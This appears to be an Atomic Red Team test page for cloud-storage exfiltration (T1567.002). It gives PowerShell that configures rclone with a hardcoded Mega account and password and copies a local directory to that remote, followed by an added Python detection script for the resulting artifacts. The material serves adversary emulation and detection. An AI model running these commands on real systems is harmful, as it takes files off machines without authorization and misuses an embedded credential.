
Exfiltration Over Web Service: Exfiltration to Cloud Storage

Description from ATT&CK

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Atomic Tests

Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)

This test uses rclone to exfiltrate data to a remote cloud storage instance (Mega). See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/

Supported Platforms: windows

auto_generated_guid: 8529ee44-279a-4a19-80bf-b846a40dda58

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rclone_path | Directory of rclone.exe | Path | $env:temp\T1567.002\rclone-v*\ |
| rclone_config_path | Path to rclone's config file (default should be fine) | Path | $env:appdata |
| dir_to_copy | Directory to copy | String | $env:temp\T1567.002 |
| mega_user_account | Mega user account | String | atomictesting@outlook.com |
| mega_user_password | Mega user password | String | vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA |
| remote_share | Remote Mega share | String | T1567002 |

Attack Commands: Run with powershell!

```powershell
New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd #{rclone_path}
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v
```
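The attack commands above leave two artifacts a defender can key on: a process-creation event for `rclone.exe` with a `config create` or `copy ... <remote>:<path>` command line, and an rclone.conf under `%APPDATA%\rclone` whose section declares `type = mega`. The following Python is an added example, not part of this Atomic test or of rclone, showing triage logic for both: it parses Sysmon-style command lines and flags rclone creating a remote or pushing a local directory to a named remote, and it parses a config file of exactly the shape `Set-Content` writes here (leading spaces and all) to report which remotes point at cloud-storage backends. The backend list, the sample command lines and the config text are constructed assumptions; the first two command lines mirror the test with a placeholder user and password.

```python
"""Added example, not part of the Atomic Red Team test or of rclone:
defender-side triage for rclone-based exfiltration to cloud storage.
Inputs are constructed: Sysmon Event ID 1-style command lines and an
rclone.conf shaped like the one the test writes with Set-Content."""
import configparser
import re
import shlex
from typing import Optional

# rclone backend names for cloud storage services (assumed list; extend it
# to match the services your environment is allowed to talk to).
CLOUD_BACKENDS = {"mega", "drive", "dropbox", "onedrive", "box", "pcloud", "s3", "b2"}
# rclone verbs that push data somewhere.
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# "remote:path" destination. Two or more characters before the colon, so a
# Windows drive letter such as D:\backup is not mistaken for a remote.
REMOTE_DEST = re.compile(r"^([A-Za-z0-9_-]{2,}):")


def _split(cmd: str) -> list:
    # posix=False keeps Windows backslashes and quoted paths intact.
    try:
        return shlex.split(cmd, posix=False)
    except ValueError:  # unbalanced quotes in a logged command line
        return cmd.split()


def analyze_command_line(cmd: str) -> Optional[dict]:
    """Return a finding dict if the command line is rclone creating a remote
    or transferring data to a named remote; otherwise None."""
    argv = _split(cmd)
    if not argv:
        return None
    exe = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in ("rclone.exe", "rclone"):
        return None
    positional = [a for a in argv[1:] if not a.startswith("-")]
    if not positional:
        return None
    verb = positional[0].lower()
    # rclone config create <name> <backend> [...]
    if verb == "config" and len(positional) >= 4 and positional[1].lower() == "create":
        backend = positional[3].lower()
        return {"rule": "rclone_remote_created", "remote": positional[2],
                "backend": backend, "cloud": backend in CLOUD_BACKENDS}
    # rclone copy|sync|move <source> <remote>:<path>
    if verb in TRANSFER_VERBS and len(positional) >= 3:
        m = REMOTE_DEST.match(positional[-1])
        if m:
            return {"rule": "rclone_transfer_to_remote", "verb": verb,
                    "remote": m.group(1), "source": positional[-2],
                    "size_capped": any(a.startswith("--max-size") for a in argv)}
    return None


def analyze_events(cmdlines) -> list:
    """Run analyze_command_line over a batch and keep only the hits."""
    return [f for f in (analyze_command_line(c) for c in cmdlines) if f]


def scan_rclone_conf(text: str) -> list:
    """List the remotes defined in an rclone.conf with their backend type.
    rclone.conf is INI; the leading spaces Set-Content leaves on each line
    are tolerated because configparser only treats an indented line as a
    continuation when a key precedes it."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    remotes = []
    for section in cp.sections():
        backend = cp[section].get("type", "").strip().lower()
        remotes.append({"remote": section, "backend": backend,
                        "cloud": backend in CLOUD_BACKENDS})
    return remotes


# Constructed Sysmon-style command lines (the first two mirror the test).
SAMPLE_CMDLINES = [
    r".\rclone.exe config create T1567002 mega",
    r".\rclone.exe copy --max-size 1700k C:\Users\alice\AppData\Local\Temp\T1567.002 T1567002:test -v",
    r"rclone.exe copy C:\src D:\backup",                    # local to local: not a hit
    r'"C:\Program Files\7-Zip\7z.exe" a out.7z C:\data',   # not rclone
]
# Constructed config text in the exact layout the test's Set-Content produces.
SAMPLE_CONF = ("[T1567002] \n type = mega \n user = tester@example.invalid \n"
               " pass = REDACTED_OBSCURED_PASSWORD")

if __name__ == "__main__":
    for hit in analyze_events(SAMPLE_CMDLINES):
        print("command line:", hit)
    for remote in scan_rclone_conf(SAMPLE_CONF):
        print("config:", remote)
```

Run stand-alone it reports two command-line hits (the remote creation and the size-capped copy to `T1567002:test`) and one cloud remote from the config. In production the same two functions would be fed by your EDR's process-creation telemetry and by a file-integrity or DFIR collection of `%APPDATA%\rclone\rclone.conf`; the `--max-size` flag is worth surfacing because the test uses it to keep transfers small and quiet.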

Cleanup Commands:

```powershell
cd #{rclone_path}
.\rclone.exe purge #{remote_share}:test
.\rclone.exe config delete #{remote_share}:
Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
cd c:\
Remove-Item $env:temp\rclone.zip
Remove-Item $env:temp\T1567.002 -recurse -force
```

Dependencies: Run with powershell!

Description: rclone must exist at (#{rclone_path})

Check Prereq Commands:

```powershell
if (Test-Path #{rclone_path}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile $env:temp\rclone.zip
Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force
```
